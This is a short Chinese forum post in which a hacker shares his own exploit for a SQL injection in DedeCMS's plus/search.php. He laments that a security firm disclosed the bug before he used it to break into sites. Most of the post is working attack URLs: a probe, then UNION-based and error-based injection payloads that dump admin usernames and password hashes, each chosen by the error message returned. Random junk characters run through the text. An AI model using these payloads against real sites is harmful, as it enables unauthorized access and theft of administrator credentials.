转载不加作者名的没JJ
% z* N5 b6 l" o
6 l- V8 z# l- O m) N哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
; N8 W, s- X6 y% t4 D) N
9 k; v# z7 P4 u9 L既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
6 t) R8 A( z2 ]" ]2 @9 v
, `; L+ r& o/ L. G2 L- W) q) {我一般是这样测试的:7 u( j7 G" e, i0 C. M3 z- D% _
2 i+ W4 q, u/ y, P0 P" R1 v0 x' v! J1 N' a
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a9 O# L9 [+ E& M" X4 p* t6 t6 ?! L
4 `1 [4 F1 z% \9 k% m+ d0 Q* l W
转载不加作者名的没JJ4 Q6 Z+ ?7 M" J& V3 I& [
& ]$ k5 j, a& b, V, P5 o作者:鬼哥
% O$ y2 Z j! R9 Z ^" D' x0 ]7 R6 [) |0 U# |$ p
/ I: A9 g8 ?/ [
4 m9 z0 H# R3 {/ M9 E: X
看结果如果提示
' v& a7 X k9 q7 ~- d) W
' e4 n( ~/ s! v7 E4 K( }% ]Safe Alert: Request Error step 2 !
9 d6 _1 I+ S. j( T) H/ N# x% f: u0 s& C% Y3 V
那么直接用下面的exp
7 n1 k- m6 D" h2 x9 H7 S) b/ s3 ?
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
0 F* L! N# S' B M0 Y* _+ }9 p0 e
, [; r" _/ C: _& x# h
$ ?7 `' D- P, L看结果如果提示! u1 \5 P) Z, ^* h
+ \& N5 t$ S+ C3 z0 U# v1 Z4 vSafe Alert: Request Error step 1 !7 R2 s3 C% ]4 A; P. e6 G
9 T0 J9 d+ e z! c* O/ z
那么直接用下面的exp+ E. |& S$ Y5 W% Q' [& p
/ \: t [3 _! `: `xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
9 u* q& Q1 w* z8 ]) z
/ i; ?) v" d: P
0 Q3 J8 M; W; q9 y% M如果正常显示证明漏洞不存在了。
( a5 r& O+ B- G. `
9 B4 L& o+ s n3 j% s8 x, y转载不加作者名的没JJ |